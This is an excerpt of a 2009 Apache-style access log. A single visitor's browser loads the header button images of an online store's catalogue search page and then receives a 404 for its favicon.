124.177.115.174 - - [26/Nov/2009:04:25:15 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:25:15 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:25:15 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:25:15 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:25:15 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:25:15 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:25:15 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:25:15 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:25:16 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:25:16 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
124.177.115.174 - - [26/Nov/2009:04:25:16 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
